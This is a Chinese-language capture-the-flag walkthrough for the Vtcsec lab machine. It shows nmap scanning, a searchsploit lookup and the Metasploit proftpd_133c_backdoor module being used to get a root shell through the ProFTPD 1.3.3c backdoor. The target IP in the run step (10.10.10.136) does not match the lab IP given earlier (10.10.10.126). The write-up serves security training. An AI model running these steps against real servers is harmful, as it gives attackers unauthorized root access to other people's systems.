简介

图片

靶场名字:Vtcsec
操作系统:Linux
任务:拿到/root/flag/
靶场IP:10.10.10.126

学习到的知识

ProFTPD后门未经授权访问漏洞导致远程命令执行

MetasploitProFTPD 1.3.3c程序进行远程命令执行

信息搜集

拿到 IP 后直接丢到NMAP一顿搜哈:

1
nmap -A -T4 10.10.10.126

图片

由上图得知,靶场开放了21(ftp)、22(ssh)、80(http)服务器,其中21所使用的ftp软件是ProFTPD 1.3.3cProFTPD是一个在Linux或者Unix下的FTP服务器程序!

还是老规矩,先搜索软件有没有对应的漏洞(这是习惯):

1
searchsploit ProFTPD 1.3.3c

图片

1
2
3
4
5
6
7
8
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16921.rb
------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

从搜索的结果得知有两个漏洞:第一个是Compromised Source Backdoor Remote Code Execution(后门远程代码执行)、第二个是Backdoor Command Execution(后门命令执行,基于Metasploit里).

既然它存在RCE,那么直接用Metasploit来对它进行利用吧,打开MSF控制台:

1
msfconsole

然后搜索一下有关ProFTPd-1.3.3cPayload

1
search ProFTPd-1.3.3c

图片

这个时候有一个漏洞利用模块:

1
exploit/unix/ftp/proftpd_133c_backdoor

先看看有关它的信息:

1
info exploit/unix/ftp/proftpd_133c_backdoor

图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
msf5 > info exploit/unix/ftp/proftpd_133c_backdoor 

Name: ProFTPD-1.3.3c Backdoor Command Execution
Module: exploit/unix/ftp/proftpd_133c_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2010-12-02

Provided by:
MC <mc@metasploit.com>
darkharper2

Available targets:
Id Name
-- ----
0 Automatic

Check supported:
No

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)

Payload information:
Space: 2000
Avoid: 0 characters

Description:
This module exploits a malicious backdoor that was added to the
ProFTPD download archive. This backdoor was present in the
proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and
2nd December 2010.

References:
OSVDB (69562)
http://www.securityfocus.com/bid/45150

可以看到,这个模块是后门命令执行的模块,它只需要设置对方的IP端口就可以,受限的版本是proftpd-1.3.3c,下面是有关它的漏洞介绍:

图片

ProFTPD 1.3.3c这个版本易于遭受未经授权访问漏洞。利用此漏洞,远程攻击者可以使用超级用户特权执行任意系统命令

那么就直接使用它吧:

1
2
use exploit/unix/ftp/proftpd_133c_backdoor
set RHOSTS 10.10.10.136

图片

最后直接运行 run 得到一个 sission:

图片

最终通过得到的sission拿到了root权限,在/root目录下拿到flag完成本次CTF!

总结

通过使用Metasploit来对ProFTPD进行远程命令执行,最终成功提权拿到FLAG!